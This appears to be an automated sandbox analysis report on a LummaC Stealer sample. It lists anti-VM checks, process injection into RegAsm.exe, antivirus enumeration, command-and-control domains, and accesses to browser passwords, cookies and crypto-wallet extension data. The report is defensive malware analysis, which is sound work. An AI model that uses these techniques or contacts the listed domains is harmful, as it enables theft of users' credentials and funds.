Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: TZ33WZy6QL.exe PID: 6072, type: MEMORYSTR

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Memory allocated: 2430000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Memory allocated: 2640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Memory allocated: 4640000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\TZ33WZy6QL.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.dll

Jump to dropped file

Source: C:\Users\user\Desktop\TZ33WZy6QL.exe TID: 344	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe TID: 2580	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1384	Thread sleep time: -90000s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\TZ33WZy6QL.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: RegAsm.exe, 00000005.00000002.1503116398.00000000011CF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWfB
Source: RegAsm.exe, 00000005.00000002.1503116398.00000000011A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.1503116398.00000000011CF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: TZ33WZy6QL.exe, 00000000.00000002.1382538159.00000000008A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_0043B600 LdrInitializeThunk,

5_2_0043B600

Source: C:\Users\user\Desktop\TZ33WZy6QL.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\TZ33WZy6QL.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.TZ33WZy6QL.exe.53b0000.1.raw.unpack, Engineers.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
Source: 0.2.TZ33WZy6QL.exe.53b0000.1.raw.unpack, Engineers.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
Source: 0.2.TZ33WZy6QL.exe.53b0000.1.raw.unpack, Engineers.cs	Reference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\TZ33WZy6QL.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Compiles code for process injection (via .Net compiler)

Source: C:\Users\user\Desktop\TZ33WZy6QL.exe

File written: C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.0.cs

Jump to dropped file

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\TZ33WZy6QL.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: TZ33WZy6QL.exe, 00000000.00000002.1383528588.0000000003649000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: moutheventushz.shop
Source: TZ33WZy6QL.exe, 00000000.00000002.1383528588.0000000003649000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: respectabosiz.shop
Source: TZ33WZy6QL.exe, 00000000.00000002.1383528588.0000000003649000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: bakedstusteeb.shop
Source: TZ33WZy6QL.exe, 00000000.00000002.1383528588.0000000003649000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: conceszustyb.shop
Source: TZ33WZy6QL.exe, 00000000.00000002.1383528588.0000000003649000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: nightybinybz.shop
Source: TZ33WZy6QL.exe, 00000000.00000002.1383528588.0000000003649000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: standartedby.shop
Source: TZ33WZy6QL.exe, 00000000.00000002.1383528588.0000000003649000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: mutterissuen.shop
Source: TZ33WZy6QL.exe, 00000000.00000002.1383528588.0000000003649000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: worddosofrm.shop
Source: TZ33WZy6QL.exe, 00000000.00000002.1383528588.0000000003649000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: knifedxejsu.cyou

Writes to foreign memory regions

Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 441000	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 444000	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 454000	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F04008	Jump to behavior

Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A5B.tmp" "c:\Users\user\AppData\Local\Temp\1l2s0ln0\CSC85B0E78DF15C46CA993256ECF87E3F19.TMP"	Jump to behavior

Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Queries volume information: C:\Users\user\Desktop\TZ33WZy6QL.exe VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\TZ33WZy6QL.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: RegAsm.exe, 00000005.00000002.1503409382.0000000001252000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4588, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000005.00000002.1503116398.00000000011CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: RegAsm.exe, 00000005.00000002.1503116398.00000000011CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: RegAsm.exe, 00000005.00000002.1503116398.00000000011CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: RegAsm.exe, 00000005.00000002.1503116398.00000000011C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: RegAsm.exe, 00000005.00000002.1503116398.00000000011C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: RegAsm.exe, 00000005.00000002.1503116398.00000000011CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
